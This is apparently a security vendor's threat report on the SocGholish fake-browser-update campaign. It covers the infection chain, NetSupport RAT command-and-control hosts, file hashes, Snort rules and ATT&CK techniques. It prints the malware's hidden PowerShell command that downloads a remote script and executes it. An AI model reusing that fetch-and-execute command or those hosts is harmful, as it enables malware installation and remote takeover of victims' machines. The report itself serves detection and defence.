The SocGholish campaign is suspected to be linked to the Russian threat actor known as “Evil Corp”. The threat actors are known to drop HTML code into outdated or vulnerable websites. When a user visits the compromised website, the code generates a pop-up within the browser attempting to trick the user into believing their browser is outdated. If a user is enticed to believe their browser is outdated, clicking the “Update” link causes the download of an archive file containing a malicious JavaScript. After the JavaScript is executed, additional malware is downloaded and installed on the user’s computer.
Infection chain
Compromised Site [Redacted] – Drive-by
casting.faeryfox[.]com – SocGholish Command and Control (C2)
aeoi[.]pl/21.ico – NetSupport RAT Download Site
94.158.247[.]32/fakeurl.htm – NetSupport RAT C2
Initial access (drive-by)
Initial access was obtained when the user browsed to the compromised site hosting the injected HTML code.
Execution
The execution stage was obtained when the user was tricked into downloading and executing the JavaScript within the downloaded archive file. The JavaScript was executed using the Windows Wscript process. The JavaScript contained obfuscated code which calls the Windows PowerShell process to connect with the download site and execute an additional PowerShell script.
Parent Process: C:\Windows\System32\wscript.exe
Child Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -w h -c “iwr -usebasicparsing http://aeoi.pl/21.ico |iex”
PowerShell Module Logs: CommandInvocation(Invoke-WebRequest): “Invoke-WebRequest” ParameterBinding(Invoke-WebRequest): name=”UseBasicParsing”; value=”True” ParameterBinding(Invoke-WebRequest): name=”Uri”; value=”http://aeoi.pl/21.ico” CommandInvocation(Invoke-Expression): “Invoke-Expression”
Persistence
Persistence was obtained by the PowerShell script hosted on the download site. The script created a registry key to run at startup.
Command and control
OpenText custom content to identify NetSupport RAT behaviours
Sigma rules
Snort rules
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”OpenText – Windows Powershell User-Agent”; flow:established,to_server; content:”User-Agent|3a 20|Mozilla/”; content:”) WindowsPowerShell/”; http_header; classtype:not-suspicious; sid:20228161; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”OpenText – NetSupport GeoLocation Lookup”; flow:established,to_server; content:”Host|3a 20|geo.netsupportsoftware.com|0d 0a|”; http_header; content:”GET”; http_method; content:”/location/loca.asp”; http_uri; sid:20228162; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET 443 (msg:”OpenText – NetSupport RAT POST Request”; flow:established,to_server; content:”POST”; content:”User-Agent|3A 20|NetSupport Manager/”; nocase; sid:20228163; rev:1;)
Indicators of compromise
SHA-256 Hash: 520b8a64a11fdfb63d584e11ec1355cba6943cf102501fe4670c6429cdc13a61 – Сhrome.Updаte.zip
https://www.virustotal.com/gui/file/520b8a64a11fdfb63d584e11ec1355cba6943cf102501fe4670c6429cdc13a61/details
SHA-256 Hash: 1455c4250fea9a6a589ea23a60e130ab3f414a510d63cbf4eaf5693012d6272d – AutoUpdater.js https://www.virustotal.com/gui/file/1455c4250fea9a6a589ea23a60e130ab3f414a510d63cbf4eaf5693012d6272d/details
SHA-256 Hash: b6b51f4273420c24ea7dc13ef4cc7615262ccbdf6f5e5a49dae604ec153055ad – client32.exe
https://www.virustotal.com/gui/file/b6b51f4273420c24ea7dc13ef4cc7615262ccbdf6f5e5a49dae604ec153055ad/details
MITRE ATT&CK techniques observed
T1189 Drive-by Compromise
T1059.007 JavaScript
T1059.001 PowerShell
T1547.001 Registry Run Keys / Startup Folder
T1140 Deobfuscate/Decode Files or Information
T1219 Remote Access Software
Maintaining system protection
The OpenTextTM Security Services team uses their extensive experience to identify an organization’s security risks and work with them to keep systems protected, offering multiple services to address cybersecurity and privacy objectives. Contact us for more information.
Author: Lenny Conway, Lead Consultant
